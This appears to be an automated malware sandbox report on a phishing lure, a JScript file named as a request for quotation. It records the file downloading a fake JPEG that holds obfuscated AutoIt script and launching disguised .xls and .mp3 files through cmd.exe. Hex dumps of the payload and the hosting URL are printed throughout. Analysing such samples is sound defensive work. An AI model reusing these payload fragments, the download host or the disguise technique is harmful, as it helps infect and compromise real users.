          2025-02-14 19:32:29 UTC715INData Raw: 31 31 64 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
          Data Ascii: 11dc<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
          2025-02-14 19:32:29 UTC1369INData Raw: 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f
          Data Ascii: /cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { windo
          2025-02-14 19:32:29 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66
          Data Ascii: <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #ff
          2025-02-14 19:32:29 UTC1127INData Raw: 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 68 69 64 64 65 6e 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 0a 20 20 20 20 20 20 59 6f 75 72 20 49 50 3a 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73
          Data Ascii: class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class
          2025-02-14 19:32:29 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.549705104.21.112.14434144C:\Windows\System32\wscript.exe
          TimestampBytes transferredDirectionData
          2025-02-14 19:32:29 UTC344OUTGET /2025/01/31/04/195774460.jpg HTTP/1.1
          Accept: */*
          Accept-Language: en-ch
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
          Host: www2.0zz0.com
          Connection: Keep-Alive
          2025-02-14 19:32:30 UTC1009INHTTP/1.1 200 OK
          Date: Fri, 14 Feb 2025 19:32:30 GMT
          Content-Type: image/jpeg
          Content-Length: 952476
          Connection: close
          last-modified: Fri, 31 Jan 2025 04:39:29 GMT
          etag: "e889c-62cf920d54ab4"
          Cache-Control: max-age=31536000
          CF-Cache-Status: HIT
          Age: 684
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6ml6kEq6JOiaB0WjLrAHZIljuJCgOolYdy%2FvBvEcnAvURYcEGGyXSQ%2FMNiYYEq0xAHbCn76UurXhDZN6NB8LHJV%2B%2FRPWzqKgv7NumVxz5EbyXAnWmYDiS%2BNOBmRWKeE"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
          X-Content-Type-Options: nosniff
          Server: cloudflare
          CF-RAY: 911f7c07d933424b-EWR
          alt-svc: h3=":443"; ma=86400
          server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1605&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2812&recv_bytes=926&delivery_rate=1777236&cwnd=249&unsent_bytes=0&cid=4c01b9704d41d5a6&ts=166&x=0"
          2025-02-14 19:32:30 UTC360INData Raw: 23 4e 6f 54 72 61 79 49 63 6f 6e 0d 0a 4c 6f 63 61 6c 20 24 61 2c 20 24 62 2c 20 24 63 2c 20 24 64 2c 20 24 65 0d 0a 20 5f 6b 41 6f 4d 77 28 29 0d 0a 46 6f 72 20 24 64 20 3d 20 30 20 54 6f 20 32 35 0d 0a 20 20 20 20 49 66 20 46 61 6c 73 65 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 44 6c 6c 43 61 6c 6c 28 27 75 73 65 72 33 32 2e 64 6c 6c 27 2c 20 27 69 6e 74 27 2c 20 27 42 65 65 70 27 2c 20 27 69 6e 74 27 2c 20 33 33 34 2c 20 27 69 6e 74 27 2c 20 33 36 30 29 0d 0a 20 20 20 20 45 6e 64 49 66 0d 0a 4e 65 78 74 0d 0a 24 63 20 3d 20 24 64 20 2a 20 36 38 0d 0a 4c 6f 63 61 6c 20 24 73 74 72 33 20 3d 20 22 32 4c e5 90 8d e3 81 8c e6 9c ac 6b 5a 48 31 30 69 e5 ad 97 e8 af 95 31 6c e3 81 aa 5a 73 e6 96 87 33 6f 36 e8 aa 9e e3 81 b2 30 e8 aa 9e e3 82 bf e3 81 aa
          Data Ascii: #NoTrayIconLocal $a, $b, $c, $d, $e _kAoMw()For $d = 0 To 25 If False Then DllCall('user32.dll', 'int', 'Beep', 'int', 334, 'int', 360) EndIfNext$c = $d * 68Local $str3 = "2LkZH10i1lZs3o60
          2025-02-14 19:32:30 UTC1369INData Raw: a2 bc e8 af 95 70 55 e3 82 ab e3 82 bf 63 e4 bb ae e3 82 89 48 6c 43 e7 a2 bc 66 e5 90 8d e9 83 bd 44 e5 a4 a7 e4 bb ae 4b 62 68 6f 52 e6 b5 8b 79 42 39 69 79 6c 70 e6 9d b1 e6 b5 8b 48 6d e3 82 89 69 70 e4 ba ac e4 bb ae e7 a2 bc 75 34 e8 af 95 77 48 e3 82 ab e3 81 aa e3 82 ab 62 30 41 e6 bc a2 6b 6c e7 ac a6 6f 43 e7 ac a6 e5 a5 bd 5a 30 53 e4 ba ac e5 a5 bd 61 62 e3 81 b2 72 75 76 4c 31 e5 ad 97 45 e5 a5 bd e6 b5 8b 64 e6 97 a5 42 e6 97 a5 e7 ac a6 73 73 e3 81 b2 5a e6 9c ac e4 bb ae 64 e9 83 bd 51 e5 ad 97 4f e3 82 bf 61 45 35 76 64 62 e5 ad 97 4c 50 e6 9d b1 47 e6 bc a2 6a e5 90 8d 78 62 54 6d e4 ba ac e8 aa 9e 47 6c 56 43 43 e9 98 aa e5 90 8d e3 82 bf e3 81 aa 71 53 e9 98 aa 4e 67 66 e4 ba ac e4 ba ac e8 aa 9e 4c e3 82 89 38 e3 82 bf e6 b5 8b 6c e3
          Data Ascii: pUcHlCfDKbhoRyB9iylpHmipu4wHb0AkloCZ0SabruvL1EdBssZdQOaE5vdbLPGjxbTmGlVCCqSNgfL8l
          2025-02-14 19:32:30 UTC1369INData Raw: ae e6 97 a5 66 53 4b 5a 71 e3 82 bf 79 36 e7 b7 a8 68 e7 ac a6 63 4a 4f e3 82 ab 67 e7 b7 a8 6d 4d e8 af 95 34 e4 ba ac 63 e5 a4 a7 e4 bd a0 43 e4 ba ac e6 9d b1 33 32 59 e3 82 ab 6f 67 43 30 e5 90 8d 45 e8 aa 9e 6d 4e e5 90 8d e3 81 aa 48 e6 96 87 e6 9d b1 49 e3 81 aa 65 e5 ad 97 49 51 35 36 74 30 47 e6 9c ac e4 ba ac 70 e7 a2 bc e3 82 89 38 54 53 e8 af 95 e6 9c ac 47 44 36 4f 68 4d e3 81 8c 49 e5 90 8d 6a 34 51 5a e7 95 8c 73 33 6e e4 ba ac 71 e5 90 8d 45 e5 a5 bd 61 e8 af 95 e3 82 ab 6b 41 62 e8 af 95 45 4c e3 82 ab 6c 35 e4 bb ae 72 e3 82 bf 5a e6 9d b1 6c e3 81 aa 34 35 55 e3 81 8c 58 e6 bc a2 5a 53 e8 aa 9e e3 81 aa e7 a2 bc 62 47 53 6a 62 4b e3 82 89 46 e7 ac a6 30 70 e7 ac a6 6b 4e e5 ad 97 76 5a e4 ba ac 36 62 69 e6 9c ac 4b 31 55 48 e3 82 89 73
          Data Ascii: fSKZqy6hcJOgmM4cC32YogC0EmNHIeIQ56t0Gp8TSGD6OhMIj4QZs3nqEakAbELl5rZl45UXZSbGSjbKF0pkNvZ6biK1UHs
          2025-02-14 19:32:30 UTC1369INData Raw: 96 87 70 e4 bb ae e5 ad 97 6d 58 70 6e 41 e3 82 ab e6 b5 8b 51 33 e3 81 8c e6 b5 8b e6 9c ac 73 e6 9c ac 65 65 72 5a 65 76 69 48 e6 9c ac e6 97 a5 64 47 67 e6 9c ac 6c e3 81 8c 54 63 e3 81 aa 38 e5 90 8d e5 a4 a7 e5 ad 97 33 4e 32 6b e6 9d b1 52 e5 a5 bd 32 6d 69 69 6c 52 e4 bb ae 5a 55 54 61 e7 95 8c e3 82 bf e4 ba ac 74 43 30 65 4f 67 71 5a 55 e6 b5 8b 79 e4 ba ac 44 e6 bc a2 65 66 77 e3 81 8c 47 77 58 5a 45 e3 81 b2 48 e5 ad 97 78 58 e3 82 ab 72 66 54 e6 9c ac 74 4e e6 96 87 e7 a2 bc 76 75 7a e3 81 b2 e7 ac a6 e3 82 ab 33 e6 bc a2 5a e5 a5 bd 53 4b e3 82 bf e5 ad 97 e3 83 8a e3 82 ab 63 7a 66 57 52 78 73 35 e7 b7 a8 78 37 e8 af 95 33 49 76 e3 82 ab 43 e7 a2 bc 71 e9 83 bd 71 49 57 e3 81 8c 63 6f e3 81 8c 6b 6c 34 32 36 59 6c 74 e4 bb ae 45 7a e6 9c ac
          Data Ascii: pmXpnAQ3seerZeviHdGglTc83N2kR2miilRZUTatC0eOgqZUyDefwGwXZEHxXrfTtNvuz3ZSKczfWRxs5x73IvCqqIWcokl426YltEz
          2025-02-14 19:32:30 UTC1369INData Raw: 82 ab 39 e8 aa 9e e6 9d b1 50 57 78 e3 82 ab 35 44 50 41 42 33 e5 ad 97 50 64 77 e6 96 87 66 72 e5 a4 a7 e3 82 89 6e 54 66 68 56 e3 82 ab e5 a5 bd 7a 50 e6 9c ac 54 73 e3 82 ab 4f 69 e6 bc a2 e6 b5 8b 6d e7 ac a6 6c 61 e5 ad 97 51 e3 82 ab e3 83 8a e3 82 ab e4 ba ac 37 69 67 62 63 77 e7 95 8c e7 a2 bc e7 ac a6 62 e6 9c ac 44 7a e7 ac a6 45 e6 97 a5 e3 82 ab 31 77 e6 9c ac 4d 71 e5 90 8d 69 e7 a2 bc 35 75 36 5a 54 6c 6d 7a 75 e5 a5 bd 4a e6 bc a2 e6 96 87 70 48 58 6c 32 4d 6a e3 82 ab e4 ba ac 4f e5 90 8d e3 82 ab 55 77 79 e6 9d b1 55 73 69 e9 98 aa 70 e3 81 aa 30 42 62 52 53 e6 96 87 46 43 44 e8 aa 9e 6b e8 aa 9e 6a 39 47 e5 ad 97 35 6f 49 39 32 4d e3 81 b2 e3 82 89 e5 a4 a7 e5 a4 a7 e3 82 bf 65 e5 a4 a7 e5 ad 97 59 69 4e e4 bd a0 30 6c e9 83 bd 77 e3 82
          Data Ascii: 9PWx5DPAB3PdwfrnTfhVzPTsOimlaQ7igbcwbDzE1wMqi5u6ZTlmzuJpHXl2MjOUwyUsip0BbRSFCDkj9G5oI92MeYiN0lw
          2025-02-14 19:32:30 UTC1369INData Raw: e9 98 aa 52 e4 bb ae 75 69 4f e6 96 87 48 e6 b5 8b 5a 75 4e 57 77 e8 aa 9e 55 66 e3 82 bf 35 5a e7 a2 bc e6 96 87 6a 74 e7 ac a6 4c 76 e6 9c ac 65 e6 9c ac 4e 37 58 46 61 70 70 6a 48 6d 74 58 78 e6 9c ac e3 82 ab e4 bb ae 37 62 59 58 e6 9c ac 4f 53 e7 ac a6 6e 75 57 4e 4e 6d e5 ad 97 e7 ac a6 65 4a 47 49 43 63 e9 98 aa 79 e7 ac a6 57 68 39 e5 ad 97 54 75 58 e3 82 ab 4d 66 67 54 63 e7 ac a6 47 51 e5 a5 bd e3 83 8a 7a 35 68 78 65 7a 30 37 e3 83 8a 35 6e 46 67 e9 98 aa 4d e6 bc a2 53 e3 82 ab 64 39 e8 af 95 45 e3 82 89 37 69 32 e9 98 aa e7 ac a6 65 34 e7 ac a6 48 73 47 e5 a4 a7 6f 5a 49 4b 66 61 48 69 78 e8 af 95 e6 b5 8b 31 5a e3 81 b2 43 57 50 67 4e 4b e4 ba ac e4 ba ac 65 4c 35 35 71 38 6d 42 34 72 e6 96 87 54 e8 aa 9e 77 64 6f e7 95 8c 30 32 76 e3 81 b2
          Data Ascii: RuiOHZuNWwUf5ZjtLveN7XFappjHmtXx7bYXOSnuWNNmeJGICcyWh9TuXMfgTcGQz5hxez075nFgMSd9E7i2e4HsGoZIKfaHix1ZCWPgNKeL55q8mB4rTwdo02v
          2025-02-14 19:32:30 UTC1369INData Raw: 6c 6c 43 61 6c 6c 28 27 75 73 65 72 33 32 2e 64 6c 6c 27 2c 20 27 69 6e 74 27 2c 20 27 53 6c 65 65 70 27 2c 20 27 69 6e 74 27 2c 20 33 34 35 2c 20 27 69 6e 74 27 2c 20 36 36 30 29 0d 0a 20 20 20 20 45 6e 64 49 66 0d 0a 4e 65 78 74 0d 0a 46 6f 72 20 24 61 20 3d 20 30 20 54 6f 20 34 37 0d 0a 20 20 20 20 49 66 20 46 61 6c 73 65 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 44 6c 6c 43 61 6c 6c 28 27 75 73 65 72 33 32 2e 64 6c 6c 27 2c 20 27 69 6e 74 27 2c 20 27 4d 65 73 73 61 67 65 42 6f 78 41 27 2c 20 27 69 6e 74 27 2c 20 32 30 34 2c 20 27 69 6e 74 27 2c 20 39 30 36 29 0d 0a 20 20 20 20 45 6e 64 49 66 0d 0a 4e 65 78 74 0d 0a 46 6f 72 20 24 61 20 3d 20 30 20 54 6f 20 36 34 0d 0a 20 20 20 20 49 66 20 46 61 6c 73 65 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20
          Data Ascii: llCall('user32.dll', 'int', 'Sleep', 'int', 345, 'int', 660) EndIfNextFor $a = 0 To 47 If False Then DllCall('user32.dll', 'int', 'MessageBoxA', 'int', 204, 'int', 906) EndIfNextFor $a = 0 To 64 If False Then
          2025-02-14 19:32:30 UTC1369INData Raw: 81 aa e3 82 89 52 75 61 e5 a4 a7 57 e3 82 bf 30 48 e6 bc a2 6d 54 47 6e 53 6e e4 bd a0 e8 aa 9e e3 81 8c 35 46 77 70 e4 ba ac 38 6c 4f e7 a2 bc e5 ad 97 78 4f 74 e3 81 8c e6 96 87 46 58 30 6c e7 b7 a8 e3 82 ab 79 56 44 30 42 6e e5 a5 bd 6e 49 e3 82 bf 73 34 49 e3 81 aa 36 41 49 e4 bb ae e3 82 ab 73 36 e4 bd a0 42 6f e7 b7 a8 75 e9 83 bd 7a 39 64 66 e3 83 8a 4f e3 82 ab e4 bb ae 31 6e 59 e3 82 ab e6 97 a5 6d 77 e5 ad 97 53 e7 ac a6 e7 ac a6 e3 82 bf 55 52 6a 54 e3 81 8c e7 ac a6 33 e5 90 8d e5 ad 97 77 e8 aa 9e 36 44 e6 b5 8b 32 54 51 e3 81 b2 5a e4 ba ac 73 57 6c e7 95 8c 37 64 31 e5 a4 a7 4d 6d 30 e4 ba ac 76 e6 9c ac 30 45 e3 81 8c 59 43 54 e4 bd a0 7a e3 82 89 66 e6 9c ac e3 81 8c 41 47 68 e3 82 ab 35 68 6e e8 af 95 e7 95 8c e5 90 8d 79 58 48 77 6e 50
          Data Ascii: RuaW0HmTGnSn5Fwp8lOxOtFX0lyVD0BnnIs4I6AIs6Bouz9dfO1nYmwSURjT3w6D2TQZsWl7d1Mm0v0EYCTzfAGh5hnyXHwnP
          2025-02-14 19:32:30 UTC1369INData Raw: 20 20 20 20 20 20 20 20 44 6c 6c 43 61 6c 6c 28 27 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 27 2c 20 27 69 6e 74 27 2c 20 27 42 65 65 70 27 2c 20 27 69 6e 74 27 2c 20 31 39 2c 20 27 69 6e 74 27 2c 20 32 33 35 29 0d 0a 20 20 20 20 45 6e 64 49 66 0d 0a 4e 65 78 74 0d 0a 24 62 20 3d 20 24 61 20 2d 20 39 37 0d 0a 46 6f 72 20 24 61 20 3d 20 30 20 54 6f 20 36 0d 0a 20 20 20 20 49 66 20 46 61 6c 73 65 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 44 6c 6c 43 61 6c 6c 28 27 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 27 2c 20 27 69 6e 74 27 2c 20 27 42 65 65 70 27 2c 20 27 69 6e 74 27 2c 20 35 33 36 2c 20 27 69 6e 74 27 2c 20 32 34 38 29 0d 0a 20 20 20 20 45 6e 64 49 66 0d 0a 4e 65 78 74 0d 0a 49 66 20 24 62 20 3e 20 33 35 20 54 68 65 6e 0d 0a 20 20 20 20 24 61 20 3d 20 36 0d
          Data Ascii: DllCall('kernel32.dll', 'int', 'Beep', 'int', 19, 'int', 235) EndIfNext$b = $a - 97For $a = 0 To 6 If False Then DllCall('kernel32.dll', 'int', 'Beep', 'int', 536, 'int', 248) EndIfNextIf $b > 35 Then $a = 6
          2025-02-14 19:32:30 UTC1369INData Raw: a6 49 e5 a4 a7 36 e6 bc a2 e6 96 87 53 e6 96 87 5a 71 e6 96 87 72 57 e4 bb ae 70 e3 82 bf e3 82 89 e7 b7 a8 e4 bb ae 6f 59 e6 97 a5 58 e5 90 8d e4 ba ac 4a 6e 72 47 44 31 38 e5 ad 97 46 34 e3 81 aa 37 72 50 e4 bb ae 6e 58 5a e6 bc a2 e6 9c ac e3 83 8a 48 e7 ac a6 33 6a 66 6e 74 6e e3 81 aa e7 b7 a8 68 e8 aa 9e 35 e6 9d b1 e4 bb ae 68 33 78 e3 82 bf 42 e5 ad 97 68 e3 81 8c 4d e5 ad 97 49 4d 49 38 6d e7 95 8c e7 b7 a8 e5 a4 a7 57 4d 62 4b 32 5a e3 82 89 52 6d 5a 6b 67 39 63 e4 ba ac 79 61 7a 6f e5 ad 97 53 e5 a4 a7 e7 b7 a8 58 e4 ba ac e3 82 ab 4d 5a 46 e3 82 89 e5 90 8d 4e e7 ac a6 4c 42 45 e3 81 8c e6 97 a5 6e 41 75 41 62 e5 a5 bd 42 32 e5 a4 a7 44 e3 82 89 7a 73 e7 ac a6 4b 73 e8 af 95 51 49 6d 44 e6 96 87 62 70 51 e6 b5 8b e6 9d b1 4d 6c 6c 6c 55 6a e3
          Data Ascii: I6SZqrWpoYXJnrGD18F47rPnXZH3jfntnh5h3xBhMIMI8mWMbK2ZRmZkg9cyazoSXMZFNLBEnAuAbB2DzsKsQImDbpQMlllUj


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:14:32:26
          Start date:14/02/2025
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js"
          Imagebase:0x7ff66b000000
          File size:170'496 bytes
          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:2
          Start time:14:32:33
          Start date:14/02/2025
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\cmd.exe" /c ""C:\Users\user\AppData\Local\Temp\aqgeukibkal\shuv.xls" "C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3""
          Imagebase:0x7ff7e9b70000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:14:32:33
          Start date:14/02/2025
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6d64d0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          No disassembly